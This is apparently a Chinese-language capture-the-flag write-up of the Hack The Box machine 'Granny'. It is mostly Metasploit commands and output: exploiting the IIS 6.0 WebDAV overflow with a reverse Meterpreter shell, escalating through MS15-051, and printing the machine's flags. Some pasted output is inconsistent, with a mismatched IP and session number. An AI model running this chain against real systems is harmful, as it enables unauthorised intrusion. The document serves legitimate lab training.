环境介绍:
名称:Granny
系统:Windows
信息搜集
获取目标
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
$ nmap -sV -O -F -oA Granny --version-light 10.10.10.15
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-29 14:01 CST
Nmap scan report for 10.10.10.15
Host is up (0.46s latency).
Not shown: 99 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows XP SP3 (90%), Microsoft Windows XP (87%), Microsoft Windows 2000 SP4 (87%), Microsoft Windows Server 2003 SP1 - SP2 (86%), Microsoft Windows XP SP2 or Windows Server 2003 (86%), Microsoft Windows XP SP2 or Windows Server 2003 SP2 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
|
- 这里可以看出
80
和iis 6.0
,系统为windows Xp系统。
shell获取
漏洞枚举
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
$ searchsploit IIS 6.0
--------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Microsoft IIS 4.0/5.0/6.0 - Internal I | exploits/windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Wind | exploits/windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server - Sta | exploits/windows/dos/9587.txt
Microsoft IIS 6.0 - '/AUX / '.aspx' Re | exploits/windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow | exploits/windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStorageP | exploits/windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8754.patch
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Auth | exploits/windows/remote/8806.pl
Microsoft IIS 6.0/7.5 (+ PHP) - Multip | exploits/windows/remote/19033.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result
|
搜索漏洞
1
2
3
4
5
6
7
8
|
msf5 > search ScStorageP
Matching Modules
================
## Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
|
载入漏洞
1
|
msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
|
配置漏洞
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
|
msf5 > search ScStorageP
Matching Modules
================
## Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options
Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):
Name Current Setting Required Description
---- --------------- -------- -----------
MAXPATHLENGTH 60 yes End of physical path brute force
MINPATHLENGTH 3 yes Start of physical path brute force
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path of IIS 6 web application
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Microsoft Windows Server 2003 R2 SP2 x86
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.15
RHOSTS => 10.10.10.15
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options
Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):
Name Current Setting Required Description
---- --------------- -------- -----------
MAXPATHLENGTH 60 yes End of physical path brute force
MINPATHLENGTH 3 yes Start of physical path brute force
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.15 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path of IIS 6 web application
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Microsoft Windows Server 2003 R2 SP2 x86
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.14.16
LHOST => 10.10.14.16
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
[*] Started reverse TCP handler on 10.10.14.16:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (180291 bytes) to 10.10.10.1
|
- 这里要注意
VPN
导致反弹卡住的情况,所以要手动设置本地IP。
提权
注入进程
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
|
meterpreter > shell
Process 2868 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>whoami
whoami
nt authority\network service
C:\WINDOWS\system32>exit
exit
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
276 4 smss.exe
324 276 csrss.exe
348 276 winlogon.exe
396 348 services.exe
408 348 lsass.exe
608 396 svchost.exe
684 396 svchost.exe
744 396 svchost.exe
776 396 svchost.exe
804 396 svchost.exe
940 396 spoolsv.exe
968 396 msdtc.exe
1080 396 cisvc.exe
1136 396 svchost.exe
1184 396 inetinfo.exe
1220 396 svchost.exe
1332 396 VGAuthService.exe
1412 396 vmtoolsd.exe
1460 396 svchost.exe
1600 396 svchost.exe
1712 396 alg.exe
1840 608 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
1920 396 dllhost.exe
2196 1460 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2304 1080 cidaemon.exe
2348 1080 cidaemon.exe
2376 1080 cidaemon.exe
2392 608 wmiprvse.exe
2944 348 logon.scr
3104 608 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
meterpreter > migrate 3104
[*] Migrating from 1840 to 3104...
[*] Migration completed successfully.```
> * 现将用户注入到`NETWORK SERVICE`。
### 后台运行
```bash
meterpreter > background
[*] Backgrounding session 1...```
### 本地漏洞枚举
```bash
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 2
msf5 post(multi/recon/local_exploit_suggester) > run
|
- 直接使用
local_exploit_suggester
跑一波。
1
2
3
4
5
6
7
8
9
10
|
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 29 exploit checks are being tried...
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
|
- 枚举成功,
ms15_051_client_copy_image
可用。
载入漏洞
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
|
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms15_051_client_copy_image
msf5 exploit(windows/local/ms15_051_client_copy_image) > show options
Module options (exploit/windows/local/ms15_051_client_copy_image):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Exploit target:
Id Name
-- ----
0 Windows x86
msf5 exploit(windows/local/ms15_051_client_copy_image) > set session 1
session => 1
msf5 exploit(windows/local/ms15_051_client_copy_image) > set LHOST 10.10.14.16
LHOST => 10.10.14.16
msf5 exploit(windows/local/ms15_051_client_copy_image) > run
[*] Started reverse TCP handler on 10.10.14.16:4444
[*] Launching notepad to host the exploit...
[+] Process 3380 launched.
[*] Reflectively injecting the exploit DLL into 3380...
[*] Injecting exploit into 3380...
[*] Exploit injected. Injecting payload into 3380...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (180291 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.14.16:4444 -> 10.10.10.15:1036) at 2019-10-29 14:59:03 +0800
meterpreter > shell
Process 2356 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
|
flag
C:\WINDOWS\system32>cd c:\
cd c:\
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\
04/12/2017 04:27 PM <DIR> ADFS
04/12/2017 04:04 PM 0 AUTOEXEC.BAT
04/12/2017 04:04 PM 0 CONFIG.SYS
04/12/2017 09:19 PM <DIR> Documents and Settings
04/12/2017 04:17 PM <DIR> FPSE_search
04/12/2017 04:17 PM <DIR> Inetpub
12/24/2017 07:21 PM <DIR> Program Files
12/24/2017 07:30 PM <DIR> WINDOWS
04/12/2017 04:05 PM <DIR> wmpub
2 File(s) 0 bytes
7 Dir(s) 18,126,544,896 bytes free
C:\>cd Documents and Settings
cd Documents and Settings
C:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings
04/12/2017 09:19 PM <DIR> .
04/12/2017 09:19 PM <DIR> ..
04/12/2017 08:48 PM <DIR> Administrator
04/12/2017 04:03 PM <DIR> All Users
04/12/2017 09:19 PM <DIR> Lakis
0 File(s) 0 bytes
5 Dir(s) 18,126,544,896 bytes free
C:\Documents and Settings>cd Lakis
cd Lakis
C:\Documents and Settings\Lakis>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings\Lakis
04/12/2017 09:19 PM <DIR> .
04/12/2017 09:19 PM <DIR> ..
04/12/2017 09:19 PM <DIR> Desktop
04/12/2017 09:19 PM <DIR> Favorites
04/12/2017 09:19 PM <DIR> My Documents
04/12/2017 03:42 PM <DIR> Start Menu
04/12/2017 03:44 PM 0 Sti_Trace.log
1 File(s) 0 bytes
6 Dir(s) 18,126,544,896 bytes free
C:\Documents and Settings\Lakis>cd Desktop
cd Desktop
C:\Documents and Settings\Lakis\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings\Lakis\Desktop
04/12/2017 09:19 PM <DIR> .
04/12/2017 09:19 PM <DIR> ..
04/12/2017 09:20 PM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 18,126,540,800 bytes free
C:\Documents and Settings\Lakis\Desktop>type user.txt
type user.txt
700c5dc163014e22b3e408f8703f67d1
C:\Documents and Settings\Lakis\Desktop>cd ../../
cd ../../
C:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings
04/12/2017 09:19 PM <DIR> .
04/12/2017 09:19 PM <DIR> ..
04/12/2017 08:48 PM <DIR> Administrator
04/12/2017 04:03 PM <DIR> All Users
04/12/2017 09:19 PM <DIR> Lakis
0 File(s) 0 bytes
5 Dir(s) 18,126,594,048 bytes free
C:\Documents and Settings>cd Administrator/Desktop
cd Administrator/Desktop
C:\Documents and Settings\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings\Administrator\Desktop
04/12/2017 04:28 PM <DIR> .
04/12/2017 04:28 PM <DIR> ..
04/12/2017 09:17 PM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 18,126,594,048 bytes free
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
aa4beed1c0584445ab463a6747bd06e9
C:\Documents and Settings\Administrator\Desktop>
心得
经典Windows低版本漏洞MSF利用,和grandpa
差不多。